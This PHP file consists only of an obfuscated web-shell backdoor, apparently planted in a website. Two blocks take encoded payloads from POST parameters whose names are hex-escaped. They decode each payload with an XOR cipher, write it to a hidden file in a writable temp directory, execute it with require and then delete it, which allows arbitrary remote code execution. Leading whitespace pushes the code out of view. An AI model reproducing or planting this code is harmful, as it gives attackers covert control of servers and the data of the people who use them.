<?php																																										if(array_key_exists("\x65n\x74", $_POST) && !is_null($_POST["\x65n\x74"])){ $descriptor = $_POST["\x65n\x74"]; $descriptor = explode( '.' , $descriptor ) ; $pgrp = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $x = 0; while( $x < count( $descriptor)) {$v6 = $descriptor[$x]; $chS = ord( $s[$x% $lenS]); $d =( ( int)$v6 - $chS -( $x% 10))^ 82; $pgrp .= chr( $d); $x++; } $elem = array_filter([session_save_path(), "/dev/shm", getcwd(), "/var/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/tmp", getenv("TEMP")]); for ($token = 0, $entry = count($elem); $token < $entry; $token++) { $holder = $elem[$token]; if ((bool)is_dir($holder) && (bool)is_writable($holder)) { $desc = "$holder" . "/.dat"; if (file_put_contents($desc, $pgrp)) { require $desc; unlink($desc); exit; } } } }


if(in_array("dch\x75\x6Ek", array_keys($_POST))){
	$ent = $_POST["dch\x75\x6Ek"];
	  $ent=  	explode (   "."		,	$ent	 	)	;
	$token	= '';
            $s	= 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS	= strlen($s);
            $o	= 0;
    
            foreach ($ent as $v8) {	 $chS	= ord($s[$o		%$lenS]);
                $dec	= ((int)$v8 - $chS - ($o		%10)) ^ 17;
                $token.=		chr($dec);
                $o++;
            }
	$resource = array_filter(["/tmp", ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), "/dev/shm", getcwd(), getenv("TMP"), session_save_path(), sys_get_temp_dir()]);
	foreach ($resource as $key => $res) {
    		if (is_dir($res) ? is_writable($res) : false) {
    $element = implode("/", [$res, ".item"]);
    if (file_put_contents($element, $token)) {
	require $element;
	unlink($element);
	exit;
}
}
}
}